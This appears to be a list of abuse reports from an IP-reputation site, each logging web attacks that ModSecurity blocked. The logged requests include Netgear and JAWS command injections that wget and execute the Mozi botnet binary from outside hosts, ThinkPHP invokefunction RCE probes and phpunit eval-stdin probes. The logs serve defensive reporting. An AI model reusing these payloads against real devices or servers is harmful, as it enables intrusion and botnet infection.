180.76.142.77
21 Apr 2021
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' agains ...
show more
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:ANOMALY_SCORE' (Value: `15' )
request: "GET /?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=ZwfKoPjG HTTP/1.1"
show less
Hacking
Exploited Host
Web App Attack
45.229.55.41
21 Apr 2021
ccess denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX ...
show more
ccess denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:ANOMALY_SCORE' (Value: `18' )
request: "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0"
show less
Hacking
Exploited Host
Web App Attack
61.242.40.75
09 Apr 2021
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' agains ...
show more
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:ANOMALY_SCORE' (Value: `18' )
request: "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1"
show less
Hacking
Exploited Host
Web App Attack
27.209.84.246
09 Apr 2021
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' agains ...
show more
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:ANOMALY_SCORE' (Value: `18' )
request: "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://27.209.84.246:44667/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0"
show less
Hacking
Exploited Host
Web App Attack
64.62.197.32
09 Apr 2021
failed (SSL: error:141CF06C:SSL routines:tls_parse_ctos_key_share:bad key share) while SSL handshaki ...
show more
failed (SSL: error:141CF06C:SSL routines:tls_parse_ctos_key_share:bad key share) while SSL handshaking, client: 64.62.197.32
show less
Hacking
Exploited Host
Web App Attack
213.163.116.203
09 Apr 2021
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' agains ...
show more
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:ANOMALY_SCORE' (Value: `18' )
request: "GET /shell?cd+/tmp;rm+-rf+*;wget+http://213.163.116.203:47332/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1"
show less
Hacking
Exploited Host
Web App Attack
64.227.109.56
04 Apr 2021
`TX:ANOMALY_SCORE' (Value: `15' ) request: "GET /?s=/Index/\think\app/invokefunction&function=call_u ...
show more
`TX:ANOMALY_SCORE' (Value: `15' ) request: "GET /?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=__HelloThinkPHP HTTP/1.1"
show less
Hacking
Web App Attack
45.155.205.151
04 Apr 2021
Lots of bad requests:
request: "POST /Autodiscover/Autodiscover.xml
request: "GET /wp-content/plug ...
show more
Lots of bad requests:
request: "POST /Autodiscover/Autodiscover.xml
request: "GET /wp-content/plugins/wp-file-manager/readme.txt
request: "GET /_ignition/execute-solution HTTP/1.1"
request: "GET /console/ HTTP/1.1"
`TX:ANOMALY_SCORE' (Value: `8' ) request: "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1"
`TX:ANOMALY_SCORE' (Value: `10' ) request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1"
request: "GET /solr/admin/info/system?wt=json HTTP/1.1"
request: "POST /api/jsonws/invoke HTTP/1.1"
`TX:ANOMALY_SCORE' (Value: `8' ) request: "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1"
show less
Hacking
Brute-Force
Exploited Host
Web App Attack
209.141.61.146
01 Apr 2021
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' agains ...
show more
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:ANOMALY_SCORE' (Value: `13' )
request: "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1"
show less
Hacking
Exploited Host
Web App Attack
116.73.82.129
01 Apr 2021
Hosting Malware:
request: "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+ ...
show more
Hosting Malware:
request: "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://116.73.82.129:54109/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0"
show less
Hacking
Exploited Host
185.32.164.145
01 Apr 2021
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' agains ...
show more
ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:ANOMALY_SCORE' (Value: `8' )
[uri "/.env"]
show less
Hacking
Web App Attack